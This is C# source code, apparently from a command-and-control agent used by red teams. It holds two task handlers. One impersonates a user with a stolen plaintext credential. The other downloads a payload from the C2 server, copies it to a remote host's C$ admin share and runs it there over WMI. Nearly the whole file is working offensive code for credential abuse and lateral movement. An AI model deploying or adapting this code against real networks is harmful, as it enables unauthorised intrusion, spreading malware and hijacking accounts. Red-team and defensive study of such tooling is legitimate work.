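/// <summary>
/// Create a logon token from the plaintext credential carried in the task parameters and
/// impersonate it on the current thread through CredentialManager.SetCredential.
/// </summary>
/// <param name="j">Job whose Task.parameters is a JSON-encoded MakeTokenParameter holding a MythicCredential.</param>
public static void MakeToken(Job j)
{
    var task = j.Task;
    MakeTokenParameter parameters = JsonConvert.DeserializeObject<MakeTokenParameter>(task.parameters);
    MythicCredential cred = parameters?.credential;

    // Missing or malformed JSON would otherwise surface as a NullReferenceException
    // on the first field access below.
    if (cred == null)
    {
        j.SetError("No credential was supplied to make_token.");
        return;
    }
    if (string.IsNullOrEmpty(cred.account) || string.IsNullOrEmpty(cred.credential))
    {
        j.SetError("Username and password are required for make_token.");
        return;
    }
    // A new logon needs the cleartext password; hashes, tickets, etc. cannot be used here.
    if (cred.credential_type != "plaintext")
    {
        j.SetError($"make_token can only be used with plaintext credentials, and was given credentials of type {cred.credential_type}");
        return;
    }

    // Display name only: DOMAIN\user, or .\user for a local account.
    string userFQDN = string.IsNullOrEmpty(cred.realm)
        ? ".\\" + cred.account
        : cred.realm + "\\" + cred.account;

    if (!CredentialManager.SetCredential(cred.account, cred.credential, cred.realm))
    {
        // Read the Win32 error immediately so no intervening call can overwrite it
        // (assumes SetCredential's P/Invoke declares SetLastError=true — confirm).
        int err = Marshal.GetLastWin32Error();
        // Do not echo the password back into task output: it would be stored with the
        // task results and shown in the operator log.
        j.SetError($"Failed to make_token with {userFQDN}\n\t:Error Code: {err}");
        return;
    }

    try
    {
        string whoami = CredentialManager.GetCurrentUsername();
        string msg = $"Successfully impersonated {whoami}";
        ApolloTaskResponse resp = new ApolloTaskResponse(task, msg)
        {
            artifacts = new Artifact[]
            {
                new Artifact("Logon Event", $"New Type 9 Logon for {whoami}")
            }
        };
        j.SetComplete(resp);
    }
    catch (Exception ex)
    {
        j.SetError($"Unknown error: {ex.Message}\nStackTrace{ex.StackTrace}");
    }
}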
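/// <summary>
/// Stage a payload on a remote host over its administrative share and launch it there through
/// WMIUtils.RemoteWMIExecute, optionally authenticating with an explicit plaintext credential.
/// </summary>
/// <param name="job">Job whose Task.parameters is a JSON-encoded WMIProcessExecuteParameters.</param>
/// <param name="agent">Agent whose profile is used to download the payload template from the server.</param>
public static void Execute(Job job, Agent agent)
{
    WMIProcessExecuteParameters parameters = JsonConvert.DeserializeObject<WMIProcessExecuteParameters>(job.Task.parameters);
    if (parameters == null)
    {
        job.SetError("Failed to parse task parameters.");
        return;
    }
    if (string.IsNullOrEmpty(parameters.computer))
    {
        job.SetError("No computer name passed.");
        return;
    }
    if (string.IsNullOrEmpty(parameters.template))
    {
        job.SetError("No template was given to download.");
        return;
    }

    MythicCredential cred = new MythicCredential();
    if (!string.IsNullOrEmpty(parameters.credential))
    {
        cred = JsonConvert.DeserializeObject<MythicCredential>(parameters.credential) ?? cred;
    }
    // Same restriction as make_token: authenticating to WMI needs the cleartext password.
    if (!string.IsNullOrEmpty(cred.account) && cred.credential_type != "plaintext")
    {
        job.SetError($"Remote WMI execution requires plaintext credentials, and was given credentials of type {cred.credential_type}");
        return;
    }

    string fileGuid = Guid.NewGuid().ToString();
    // remotePath is the location as seen from the target (handed to WMI); uncPath is the
    // same location reached from this host via the admin share (used for the copy).
    // Assumes remote_path is a drive-letter path on the target, e.g. C:\dir — confirm.
    string remotePath;
    string uncPath;
    if (string.IsNullOrEmpty(parameters.remote_path))
    {
        remotePath = $"C:\\Users\\Public\\{fileGuid}.exe";
        uncPath = $"\\\\{parameters.computer}\\C$\\Users\\Public\\{fileGuid}.exe";
    }
    else
    {
        remotePath = parameters.remote_path;
        uncPath = $"\\\\{parameters.computer}\\{remotePath.Replace(':', '$')}";
        // A directory was given: drop the payload inside it under a random name. The check
        // goes over the share because the path belongs to the target, not to this host.
        if (Directory.Exists(uncPath))
        {
            remotePath = Path.Combine(remotePath, $"{fileGuid}.exe");
            uncPath = Path.Combine(uncPath, $"{fileGuid}.exe");
        }
    }

    byte[] templateFile;
    try
    {
        templateFile = agent.Profile.GetFile(job.Task.id, parameters.template, agent.Profile.ChunkSize);
    }
    catch (Exception ex)
    {
        job.SetError($"Error fetching remote file: {ex.Message}");
        return;
    }
    if (templateFile == null || templateFile.Length == 0)
    {
        job.SetError($"File ID {parameters.template} was of zero length.");
        return;
    }

    try
    {
        // The copy must land on the target host, so it goes through the UNC path; writing
        // to remotePath would only drop the file on this machine. The write runs under the
        // current thread token, not under cred — impersonate first if the share needs it.
        File.WriteAllBytes(uncPath, templateFile);
        job.AddOutput(new ApolloTaskResponse(job.Task, $"Copied payload to {uncPath}"));
    }
    catch (Exception ex)
    {
        job.SetError($"Remote file copy to {uncPath} failed. \nReason: {ex.Message}");
        return;
    }

    string username = null;
    string password = null;
    if (!string.IsNullOrEmpty(cred.account))
    {
        username = string.IsNullOrEmpty(cred.realm) ? cred.account : cred.realm + "\\" + cred.account;
        password = cred.credential;
    }

    bool success = WMIUtils.RemoteWMIExecute(parameters.computer, remotePath, out string[] results, username, password);
    // results may be null on failure; joining it unguarded would throw.
    string output = results == null ? string.Empty : string.Join("\n", results);
    if (!success)
    {
        job.SetError($"WMI execution of {remotePath} on {parameters.computer} failed.\n{output}");
        return;
    }
    job.SetComplete(output);
}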